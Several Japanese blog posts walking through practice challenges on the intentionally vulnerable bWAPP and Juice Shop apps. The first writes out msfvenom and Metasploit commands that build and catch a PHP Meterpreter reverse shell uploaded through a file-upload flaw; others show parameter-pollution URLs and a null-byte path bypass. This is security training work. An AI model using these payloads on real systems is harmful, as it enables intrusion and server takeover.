Shikata Ga Nai

Private? There is no such things.

bWAPPでOther bugs-Unrestricted File Uploadをやってみた

Hello there, ('ω')ノ

 

Unrestricted File Uploadを。

画像ファイル以外になんでもアップロードできるので脆弱性ありなのですが。

 

f:id:ThisIsOne:20210720121737p:plain

 

ここからがペネトレーションテストの領域で。

まずは、ペイロードのモジュールを一覧表示させて。

 msfvenom -l payloads

 

f:id:ThisIsOne:20210720115123p:plain

 

今回は、この中からチョイスしょうと。

 

f:id:ThisIsOne:20210720115450p:plain

 

使用するペイロードのオプションの確認を。

 msfvenom -p php/meterpreter/reverse_tcp --payload-options

 

f:id:ThisIsOne:20210720120121p:plain

 

ここで一応、IPアドレスの確認をしておいて。

 

f:id:ThisIsOne:20210720115842p:plain

 

ペイロードのプログラムファイルを作成することに。

 msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.16 LPORT=4444 R > exploit.php

 

f:id:ThisIsOne:20210720115956p:plain

 

作成したファイルをbWAPPにアップロードして。

 

f:id:ThisIsOne:20210720120237p:plain

 

次に下記を起動して。

 msfconsole

 

f:id:ThisIsOne:20210720120433p:plain

 

今回は、exploit/multi/handlerを使いたいので。

下記の手順で、ペイロードタイプやローカルホストのIPアドレス等を設定して。

最後にexploitでリスナーを起動して。

 

 use exploit/multi/handler
 set payload php/meterpreter/reverse_tcp
 set lhost 192.168.0.16
 set lport 4444
 exploit

 

f:id:ThisIsOne:20210720120722p:plain

 

bWAPPでhereをクリックすると。

 

f:id:ThisIsOne:20210720121510p:plain

 

アップロードしたphpファイルが起動して。

 

f:id:ThisIsOne:20210720120938p:plain

meterpreterが起動してbWAPPのサーバに侵入することができて。

上記のページを落としても通信は継続されて。

 

f:id:ThisIsOne:20210720121049p:plain

 

Best regards, (^^ゞ

bWAPPでOther bugs-HTTP Parameter Pllutionをやってみた

Hello there, ('ω')ノ

 

なぜかまだ、HTTP Parameter Pllutionをやっていなかったようで。

 

f:id:ThisIsOne:20210719181347p:plain

 

まずは、検索キーを入力して動作確認を。

 

f:id:ThisIsOne:20210719182610p:plain

 

検索結果とパラメータを確認して。

 http://192.168.0.12/bWAPP/hpp-2.php?name=a&action=vote

 

f:id:ThisIsOne:20210719182700p:plain

 

G.I. Joe: RetaliationをVoteすると下記のパラメータが追加されて。

 http://192.168.0.12/bWAPP/hpp-3.php?movie=1&name=a&action=vote

 

f:id:ThisIsOne:20210719182745p:plain

 

ここで、同じパラメータを追加するとIron ManをVoteしたことになって。

 http://192.168.0.12/bWAPP/hpp-3.php?movie=1&name=a&action=vote&movie=2

 

f:id:ThisIsOne:20210719182850p:plain

 

次にパラメータを含んだ検索キーで検索してみると。

 a&movie=2

 

f:id:ThisIsOne:20210719184216p:plain

 

下記のようにURLにパラメータが追加されて。

 http://192.168.0.12/bWAPP/hpp-2.php?name=a%26movie%3D2&action=vote

 

f:id:ThisIsOne:20210719183208p:plain

 

G.I. Joe: RetaliationをVoteしても選択されたパラメータの後方で。

movie=2で上書きされるので、Iron ManをVoteしたことになって。

 http://192.168.0.12/bWAPP/hpp-3.php?movie=1&name=a&movie=2&action=vote

 

f:id:ThisIsOne:20210719183541p:plain

 

Man of SteelをVoteしてもIron ManをVoteしたことになって。

 http://192.168.0.12/bWAPP/hpp-3.php?movie=3&name=a&movie=2&action=vote

 

f:id:ThisIsOne:20210719183609p:plain

 

Best regards, (^^ゞ

Juice ShopのSupply Chain Attackをやってみた

Hello there, ('ω')ノ

 

いくつかの資格情報の危険性について開発チームに通知しなさいと。

 

f:id:ThisIsOne:20210718173616p:plain

 

いつものディレクトリにアクセスして。

この時点で脆弱性ありで。

 http://localhost:3000/ftp

 

f:id:ThisIsOne:20210718173838p:plain

 

さらにヌルバイトでファイルにアクセスできるので、ダウンロードして。

ここまでが脆弱性診断で。

 http://localhost:3000/ftp/package.json.bak%2500.md

 

f:id:ThisIsOne:20210718173748p:plain

 

ファイルの中身を見ると。

インシデントのあるモジュール名が。

ここからがペネトレーションテストの領域で。

 

f:id:ThisIsOne:20210718173956p:plain

 

さっそく、検索してみて。

 eslint-scope 3.7.2

 

f:id:ThisIsOne:20210718174321p:plain

 

下記のURLを。

 https://github.com/eslint/eslint-scope/issues/39

 

f:id:ThisIsOne:20210718174232p:plain

 

URLを報告して。

 

f:id:ThisIsOne:20210718174852p:plain

 

クリアできた。

 

f:id:ThisIsOne:20210718174914p:plain

 

Best regards, (^^ゞ

Juice ShopのSteganographyをやってみた

Hello there, ('ω')ノ

 

店内に隠れている悪名高いキャラクターを追い出しなさいと。

キャラクターの正確な名前が必要とのことで。

 

f:id:ThisIsOne:20210717123450p:plain

 

About Usを。

 

f:id:ThisIsOne:20210717123554p:plain

 

スライドされる画像のディレクトリを探して。

 

f:id:ThisIsOne:20210717123711p:plain

 

アクセスしたらダウンロードして。

 http://localhost:3000/assets/public/images/carousel/5.png

 

f:id:ThisIsOne:20210717123823p:plain

 

他の画像も同様に。

 

f:id:ThisIsOne:20210717124020p:plain

 

ダウンロードして。

 http://localhost:3000/assets/public/images/carousel/1.jpg

 

f:id:ThisIsOne:20210717124127p:plain

 

今回は、下記のソフトを使用することに。

 https://www.openstego.com/

 

f:id:ThisIsOne:20210717124424p:plain

 

ダウンロードは、下記からがおすすめで。

 http://openstego.findmysoft.com/

 

f:id:ThisIsOne:20210717125507p:plain

 

インストールして起動したら、左のメニューを選択して。

対象となる画像を選択して、出力先のフォルダを選択して。

 

f:id:ThisIsOne:20210717125857p:plain

 

出力された画像は、下記のようなものが。

 

f:id:ThisIsOne:20210717125805p:plain

 

googleで画像検索を。

 

f:id:ThisIsOne:20210717130321p:plain

 

よく見るとキュウリのお化けのようようで。

 

f:id:ThisIsOne:20210717130829p:plain

 

下記のサイトにアクセスしてみると正確な名前がわかって。

 https://www.chroma.london/pickle-rick

 

f:id:ThisIsOne:20210717130741p:plain

 

下記の名前を報告すると。

 Pickle Rick

 

f:id:ThisIsOne:20210717130924p:plain

 

クリアできた。

これは脆弱性診断の範囲外で、ペネトレーションテストやレッドチームの領域かと。

 

f:id:ThisIsOne:20210717130939p:plain

 

Best regards, (^^ゞ

Juice ShopのReset Bender's Passwordをやってみた

Hello there, ('ω')ノ

 

Benderのセキュリティの質問に対する元の回答を使用して.

パスワードをリセットしなさいと。

 

f:id:ThisIsOne:20210716134921p:plain

 

セキュリティの質問はいくつかあって。

 

f:id:ThisIsOne:20210716134323p:plain

 

とりあえずは、下記で検索を。

 bender first company

 

f:id:ThisIsOne:20210716135155p:plain

 

ミドルネームらしきものが。

 

f:id:ThisIsOne:20210716135121p:plain

 

さっそく、トライしたもののうまくいかず。

 

f:id:ThisIsOne:20210716135049p:plain

 

また以前は、Suicide booth construction worker (formerly)とのことで。

 

f:id:ThisIsOne:20210716140207p:plain

 

下記で検索を実施して。

 Suicide booth Futurama

 

f:id:ThisIsOne:20210716142149p:plain

 

下記のサイトからヒントを見つけ出して。

 https://en.wikipedia.org/wiki/Euthanasia_device

 

f:id:ThisIsOne:20210716142513p:plain

 

再度、下記で検索してみて。

 Stop-and-Drop suicide booths

 

f:id:ThisIsOne:20210716143024p:plain

 

下記のサイトに会社名らしきものが。

 https://theinfosphere.org/Suicide_booth

 

f:id:ThisIsOne:20210716141841p:plain

 

リンク先のサイトをみて再確認して。

 https://theinfosphere.org/Stop-N-Drop

 

f:id:ThisIsOne:20210716141915p:plain

 

下記のキーワードを入力するもののうまくいかず。

記号を変更したりと数回チャレンジすると。

 Stop-N-Drop

 Stop'N'Drop

 Stop'n'Drop

 

f:id:ThisIsOne:20210716143716p:plain

 

クリアできた。

これはペネトレーションテストというかレッドチームの領域のような。

脆弱性診断の領域ではなくて。

 

f:id:ThisIsOne:20210716143552p:plain

 

Best regards, (^^ゞ